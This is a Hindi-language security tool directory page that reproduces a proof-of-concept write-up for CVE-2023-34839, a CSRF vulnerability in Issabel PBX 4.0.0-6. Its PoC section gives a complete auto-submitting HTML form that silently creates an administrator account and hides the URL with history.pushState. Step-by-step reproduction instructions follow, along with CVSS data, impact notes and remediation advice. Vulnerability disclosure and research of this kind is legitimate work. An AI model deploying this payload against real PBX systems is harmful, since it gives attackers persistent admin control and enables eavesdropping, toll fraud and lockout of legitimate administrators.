Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-34839 — CVE-2023-34839 Issabel PBX संस्करण 4.0.0-6 में खोजी गई एक Cross-Site Request Forgery (CSRF) भेद्यता है, जो एक व्यापक रूप से उपयोग किया जाने वाला ओपन-सोर्स यूनिफाइड कम्युनिकेशंस प्लेटफॉर्म है। | Kitploit
उपकरण/GitHubGitHub/sahiloj/cve-2023-34839
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेपर और शोधलर्निंग और शिक्षा
GitHubsahiloj/cve-2023-34839

CVE-2023-34839

CVE-2023-34839 Issabel PBX संस्करण 4.0.0-6 में खोजी गई एक Cross-Site Request Forgery (CSRF) भेद्यता है, जो एक व्यापक रूप से उपयोग किया जाने वाला ओपन-सोर्स यूनिफाइड कम्युनिकेशंस प्लेटफॉर्म है।

रिपॉजिटरी देखें
5316 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-34839 — Issabel PBX 4.0.0-6: CSRF से विशेषाधिकार वृद्धि

CVE Severity CVSS Affected Version


विषय-सूची

  • अवलोकन
  • भेद्यता विवरण
  • प्रभावित सॉफ़्टवेयर
  • CVSS स्कोर
  • हमले का परिदृश्य
  • प्रूफ ऑफ कॉन्सेप्ट (PoC)
  • पुनरुत्पादन के चरण
  • प्रभाव
  • उपचार (Remediation)
  • संदर्भ
  • अस्वीकरण

अवलोकन

CVE-2023-34839 एक क्रॉस-साइट अनुरोध जालसाजी (CSRF) भेद्यता है जो Issabel PBX संस्करण 4.0.0-6 में खोजी गई है, जो व्यापक रूप से उपयोग किया जाने वाला ओपन-सोर्स यूनिफाइड कम्युनिकेशंस प्लेटफ़ॉर्म है। यह भेद्यता यूज़र-प्रबंधन एंडपॉइंट में मौजूद है और एक बिना प्रमाणित (unauthenticated) दूरस्थ हमलावर को, वर्तमान में प्रमाणित व्यवस्थापक को एक विशेष रूप से तैयार किए गए वेबपेज पर जाने के लिए धोखा देकर, चुपचाप एक नया व्यवस्थापक खाता बनाने की अनुमति देती है।

फ़ील्डमान
CVE IDCVE-2023-34839
दिनांक23 जून 2023
शोधकर्ताSahil Ojha
विक्रेताIssabel
उत्पादIssabel PBX
संस्करण4.0.0-6
परीक्षण किया गयाWindows

भेद्यता विवरण

Issabel PBX 4.0.0-6 यूज़र निर्माण एंडपॉइंट पर CSRF सुरक्षा (जैसे सिंक्रोनाइज़र टोकन, SameSite कुकी विशेषताएँ, या Origin / Referer हेडर सत्यापन) लागू नहीं करता है:

root@kitploit:~
POST /index.php?menu=userlist&action=new

चूँकि एप्लिकेशन प्रमाणीकरण के लिए केवल सत्र कुकीज़ (session cookies) पर निर्भर करता है और स्थिति-परिवर्तन (state-changing) अनुरोधों का कोई सत्यापन नहीं करता, किसी भी ओरिजिन से प्रस्तुत एक जाली POST अनुरोध को लॉग-इन व्यवस्थापक सत्र के पूर्ण विशेषाधिकारों के साथ स्वीकार और संसाधित कर लिया जाएगा।

मूल कारण: स्थिति-परिवर्तन वाले प्रशासनिक एंडपॉइंट्स पर एंटी-CSRF टोकन सत्यापन का अभाव।

भेद्यता वर्ग: CWE-352 — क्रॉस-साइट अनुरोध जालसाजी (CSRF)


प्रभावित सॉफ़्टवेयर

सॉफ़्टवेयरसंस्करणस्थिति
Issabel PBX4.0.0-6भेद्य ✔
  • विक्रेता का होमपेज: https://www.issabel.org/
  • स्रोत कोड: https://github.com/IssabelFoundation/issabelPBX

CVSS स्कोर

मीट्रिकमान
CVSS v3.1 वेक्टरAV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
आधार स्कोर8.8 (उच्च)
हमला वेक्टरनेटवर्क
हमले की जटिलताकम
आवश्यक विशेषाधिकारकोई नहीं
उपयोगकर्ता सहभागिताआवश्यक (व्यवस्थापक की विज़िट)
दायराअपरिवर्तित
गोपनीयताउच्च
अखंडताउच्च
उपलब्धताउच्च

हमले का परिदृश्य

एक हमलावर निम्नलिखित उच्च-स्तरीय चरणों के माध्यम से इस भेद्यता का शोषण कर सकता है:

  1. एक दुर्भावनापूर्ण HTML पेज तैयार करें जिसमें Issabel PBX यूज़र-निर्माण एंडपॉइंट को लक्षित करने वाला एक छिपा हुआ फ़ॉर्म हो, जिसमें हमलावर-नियंत्रित मान (यूज़रनेम, पासवर्ड, समूह = व्यवस्थापक) भरे हों।
  2. दुर्भावनापूर्ण पेज को होस्ट करें किसी सर्वर पर, या इसे फ़िशिंग ईमेल, चैट संदेश, या किसी भी सोशल-इंजीनियरिंग माध्यम से लक्षित व्यवस्थापक को भेजें।
  3. व्यवस्थापक द्वारा लिंक खोलने की प्रतीक्षा करें, जबकि उनका Issabel PBX एप्लिकेशन के साथ एक सक्रिय, प्रमाणित सत्र हो।
  4. ब्राउज़र पीड़ित के मौजूदा सत्र कुकी का उपयोग करके फ़ॉर्म को स्वतः सबमिट करता है, जिससे एप्लिकेशन चुपचाप एक नया व्यवस्थापक खाता बना लेता है।
  5. हमलावर नवनिर्मित क्रेडेंशियल्स से लॉग इन करता है और उसे PBX सिस्टम तक पूर्ण व्यवस्थापक पहुँच प्राप्त होती है, जिसमें कॉल रूटिंग, रिकॉर्डिंग, SIP ट्रंक कॉन्फ़िगरेशन और सभी सिस्टम सेटिंग्स शामिल हैं।

पीड़ित की ओर से एक बार के पेज विज़िट के अलावा किसी अन्य सहभागिता की आवश्यकता नहीं है।


प्रूफ ऑफ कॉन्सेप्ट (PoC)

⚠️ केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए।
लक्षित Issabel PBX इंस्टेंस के होस्टनाम या IP पते से localhost को बदलें।
यदि आप स्व-हस्ताक्षरित प्रमाणपत्र वाले https:// एंडपॉइंट के विरुद्ध परीक्षण कर रहे हैं, तो आपको पहले उसी ब्राउज़र में लक्षित URL पर जाकर प्रमाणपत्र चेतावनी स्वीकार करनी होगी; अन्यथा ब्राउज़र क्रॉस-ओरिजिन फ़ॉर्म सबमिशन को अवरुद्ध कर देगा।

root@kitploit:~
<html>
  <!-- CSRF Exploit — CVE-2023-34839 -->
  <body>
    <form action="https://localhost/index.php?menu=userlist&action=new" method="POST">
      <input type="hidden" name="save"             value="Save" />
      <input type="hidden" name="name"             value="CSRF" />
      <input type="hidden" name="description"      value="CSRF Test Account" />
      <input type="hidden" name="password1"        value="Test@123" />
      <input type="hidden" name="password2"        value="Test@123" />
      <input type="hidden" name="group"            value="1" />   <!-- 1 = Administrator -->
      <input type="hidden" name="extension"        value="" />
      <input type="hidden" name="webmailuser"      value="" />
      <input type="hidden" name="webmaildomain"    value="" />
      <input type="hidden" name="webmailpassword1" value="" />
      <input type="hidden" name="id_user"          value="" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

एक्सप्लॉइट फ़ाइल इस रिपॉज़िटरी में भी उपलब्ध है: CSRF Exploit.html


पुनरुत्पादन के चरण

पूर्वापेक्षाएँ

  • एक चालू Issabel PBX 4.0.0-6 इंस्टेंस।
  • एक सक्रिय ब्राउज़र सत्र वाला व्यवस्थापक खाता।
  • व्यवस्थापक सत्र वाली उसी मशीन पर एक ब्राउज़र।

चरण 1 — व्यवस्थापक के रूप में Issabel PBX में लॉग इन करें

Issabel PBX वेब इंटरफ़ेस पर जाएँ और व्यवस्थापक क्रेडेंशियल्स से लॉग इन करें।

Issabel PBX लॉगिन


चरण 2 — CSRF एक्सप्लॉइट तैयार करें

ऊपर दिए गए PoC HTML कोड को कॉपी करें और इसे एक .html फ़ाइल के रूप में सहेजें, तथा localhost को लक्षित Issabel इंस्टेंस के वास्तविक होस्टनाम या IP पते से बदलें।

एक्सप्लॉइट एप्लिकेशन में एक नया यूज़र निर्माण अनुरोध चुपचाप POST करने के लिए छिपे हुए फ़ॉर्म फ़ील्ड्स का उपयोग करता है। जब पेज लोड होता है, तो एम्बेडेड जावास्क्रिप्ट बिना किसी दृश्य उपयोगकर्ता क्रिया के तुरंत फ़ॉर्म सबमिट कर देती है।

CSRF एक्सप्लॉइट HTML


चरण 3 — एक्सप्लॉइट को उसी ब्राउज़र में खोलें

सहेजी गई HTML फ़ाइल को उसी ब्राउज़र में (एक नए टैब में) खोलें जबकि व्यवस्थापक सत्र अभी भी सक्रिय हो। पेज लोड होते ही फ़ॉर्म स्वतः सबमिट हो जाएगा।


चरण 4 — नए व्यवस्थापक खाते के निर्माण की पुष्टि करें

Issabel PBX यूज़र प्रबंधन पैनल पर वापस जाएँ। एक नया यूज़र खाता (इस PoC में, नाम CSRF) पूर्ण व्यवस्थापक विशेषाधिकारों के साथ बना दिया गया होगा — एक्सप्लॉइट पेज खोलने के अलावा किसी अतिरिक्त सहभागिता के बिना।

नया व्यवस्थापक यूज़र बनाया गया


प्रभाव

CVE-2023-34839 का सफल शोषण एक हमलावर को निम्नलिखित की अनुमति देता है:

  • PBX सिस्टम पर दुष्ट (rogue) व्यवस्थापक खाते बनाना, जिससे स्थायी पूर्ण-विशेषाधिकार पहुँच प्राप्त होती है।
  • कॉल रूटिंग और SIP ट्रंक को संशोधित करना, जिससे छिपकर बात सुनना (eavesdropping) या टोल फ्रॉड संभव होता है।
  • वॉइसमेल रिकॉर्डिंग और कॉल विवरण रिकॉर्ड (CDRs) तक पहुँचना, जिससे संवेदनशील जानकारी का खुलासा होता है।
  • पासवर्ड बदलकर या मौजूदा खातों को हटाकर वैध व्यवस्थापकों को बाहर करना।
  • PBX कॉन्फ़िगरेशन को बदलकर या हटाकर संचार को बाधित करना।

चूँकि दुष्ट खाता पीड़ित के सत्र समाप्त होने के बाद भी बना रहता है, हमलावर को तब तक अनिश्चितकालीन पहुँच प्राप्त रहती है जब तक कि खाते का पता लगाकर उसे हटा न दिया जाए।


उपचार (Remediation)

Issabel PBX व्यवस्थापकों और डेवलपर्स को निम्नलिखित शमन उपाय लागू करने चाहिए:

  1. एंटी-CSRF टोकन लागू करें: प्रत्येक स्थिति-परिवर्तन फ़ॉर्म के लिए एक अद्वितीय, अप्रत्याशित, सत्र-बद्ध टोकन उत्पन्न करें। किसी भी POST अनुरोध को संसाधित करने से पहले टोकन को सर्वर-साइड पर सत्यापित करें।

  2. सत्र कुकीज़ पर SameSite=Strict या SameSite=Lax लागू करें: यह ब्राउज़रों को क्रॉस-साइट अनुरोधों पर कुकीज़ नहीं भेजने का निर्देश देता है, जिससे आधुनिक ब्राउज़रों में क्लासिक CSRF हमले प्रभावी रूप से रुक जाते हैं।

  3. Origin और Referer हेडर को सत्यापित करें: उन अनुरोधों को अस्वीकार करें जिनका Origin या Referer हेडर अपेक्षित एप्लिकेशन डोमेन से मेल नहीं खाता।

  4. संवेदनशील कार्यों के लिए पुनः प्रमाणीकरण आवश्यक करें: नए व्यवस्थापक-स्तरीय खातों के निर्माण की अनुमति देने से पहले व्यवस्थापक से उनका वर्तमान पासवर्ड माँगें।

  5. नवीनतम सुरक्षा पैच लागू करें: इस CVE को संबोधित करने वाले पैच के लिए Issabel रिलीज़ पेज और आधिकारिक रिपॉज़िटरी की निगरानी करें।


संदर्भ

  • NVD — CVE-2023-34839
  • OWASP — क्रॉस-साइट अनुरोध जालसाजी (CSRF)
  • CWE-352: क्रॉस-साइट अनुरोध जालसाजी
  • Issabel आधिकारिक वेबसाइट
  • GitHub पर IssabelFoundation/issabelPBX

अस्वीकरण

यह रिपॉज़िटरी केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा अनुसंधान के लिए है। यहाँ दी गई जानकारी और प्रूफ-ऑफ-कॉन्सेप्ट कोड का उपयोग केवल उन सिस्टमों के विरुद्ध किया जाना चाहिए जिनके आप स्वामी हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है। उन सिस्टमों के विरुद्ध इस एक्सप्लॉइट का अनधिकृत उपयोग जिनके आप स्वामी नहीं हैं, अवैध है और इसके परिणामस्वरूप आपराधिक अभियोजन हो सकता है। लेखक इस रिपॉज़िटरी में निहित जानकारी के किसी भी दुरुपयोग के लिए कोई दायित्व नहीं मानता है।

टूल डाउनलोड करें